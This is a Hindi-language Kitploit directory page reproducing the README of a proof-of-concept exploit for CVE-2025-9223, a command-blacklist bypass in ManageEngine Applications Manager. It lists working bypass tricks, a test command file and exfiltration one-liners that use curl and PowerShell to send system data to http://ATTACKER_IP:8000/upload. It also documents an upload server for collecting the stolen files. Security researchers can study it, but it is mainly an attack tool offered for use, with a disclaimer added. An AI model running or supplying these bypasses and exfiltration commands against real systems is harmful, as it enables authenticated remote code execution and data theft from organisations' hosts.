Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9223 — POC CVE-2025-9223 | Kitploit
उपकरण/GitHubGitHub/networkkiller/cve-2025-9223
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

POC CVE-2025-9223

रिपॉजिटरी देखें
2410 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 विवरण

इस रिपॉजिटरी में ManageEngine Applications Manager के "Execute Program Action" फंक्शन में कमांड निष्पादन भेद्यता को प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है।

🔍 भेद्यता विवरण

Applications Manager खतरनाक कमांड को ब्लॉक करने के लिए एक ब्लैकलिस्ट (BlackListCommands) का उपयोग करता है, लेकिन मान्यता में गंभीर कमियाँ हैं:

  • स्ट्रिंग-आधारित मान्यता केवल पहले टोकन पर
  • पथ सामान्यीकरण या एनवायरनमेंट वेरिएबल विस्तार का अभाव
  • स्क्रिप्ट के माध्यम से अप्रत्यक्ष निष्पादन के खिलाफ कोई सुरक्षा नहीं

🚨 बाइपास के तरीके

टूल डाउनलोड करें
तरीकाउदाहरण
पूर्ण पथC:\Windows\System32\netstat.exe
एनवायरनमेंट वेरिएबल%SystemRoot%\System32\netstat.exe
स्क्रिप्ट रैपरecho netstat > a.bat && a.bat

💥 प्रभाव

  • ✅ Applications Manager होस्ट पर प्रमाणित रिमोट कोड निष्पादन (RCE)
  • ✅ सुरक्षा प्रतिबंधों को दरकिनार करते हुए पूर्ण सिस्टम कमांड निष्पादन
  • ✅ सिस्टम उपयोगिताओं (curl, powershell, certutil) का उपयोग करके डेटा बहिर्वाह

📤 एक्सफिल्ट्रेशन पेलोड का उदाहरण

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ कॉन्फ़िगरेशन और उपयोग

पूर्वापेक्षाएँ

  • Python 3.x
  • लक्ष्य Applications Manager इंस्टेंस तक नेटवर्क पहुंच
  • "Execute Program Action" अनुमतियों के साथ प्रमाणित पहुंच

फ़ाइल अपलोड सर्वर

स्क्रिप्ट upload_server.py एक्सफिल्ट्रेटेड फ़ाइलों को प्राप्त करने के लिए एक सरल HTTP सर्वर प्रदान करती है।

मूल उपयोग

root@kitploit:~
python3 upload_server.py

उन्नत विकल्प

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

पैरामीटर

  • --host: बाइंड पता (डिफ़ॉल्ट: 0.0.0.0)
  • --port: HTTP पोर्ट (डिफ़ॉल्ट: 8000)
  • --dir: आउटपुट निर्देशिका (डिफ़ॉल्ट: वर्तमान निर्देशिका)

API एंडपॉइंट

तरीकाएंडपॉइंटविवरण
GET/हाल ही में अपलोड की गई फ़ाइलों की सूची
POST/uploadफ़ाइलें अपलोड करें (multipart/form-data)
PUT/upload/[filename]फ़ाइलों की सीधी अपलोड

सुरक्षा सुविधाएँ

✅ पथ ट्रैवर्सल से सुरक्षा
✅ टाइमस्टैम्प के साथ अद्वितीय फ़ाइल नाम
✅ IP और User-Agent के साथ अनुरोध लॉगिंग
✅ कंटेंट प्रकार सत्यापन

🎯 परीक्षण आदेश

बाइपास उदाहरणों के साथ एक test_commands.txt फ़ाइल बनाएँ:

root@kitploit:~
# पूर्ण पथ के साथ बाइपास
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# एनवायरनमेंट वेरिएबल के साथ बाइपास
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# स्क्रिप्ट रैपर के साथ बाइपास
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# डेटा बहिर्वाह के उदाहरण
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ कानूनी चेतावनी

महत्वपूर्ण: यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

❌ उन सिस्टम पर उपयोग न करें जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है
❌ किसी भी अवैध गतिविधि के लिए उपयोग न करें
✅ केवल नियंत्रित वातावरण में सुरक्षा अनुसंधान के लिए उपयोग करें
✅ परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करें

लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। उपयोगकर्ता सभी जिम्मेदारी और जोखिम वहन करते हैं।

📄 लाइसेंस

यह प्रोजेक्ट केवल अनुसंधान और शैक्षिक उद्देश्यों के लिए है। सर्वाधिकार सुरक्षित।

👨‍💻 लेखक

Johan Aybar - शैक्षिक उद्देश्यों के लिए


⚠️ याद दिलाना: इस PoC का उपयोग केवल अधिकृत परीक्षण वातावरण में किया जाना चाहिए। अनधिकृत उपयोग अवैध हो सकता है और सख्ती से प्रतिबंधित है।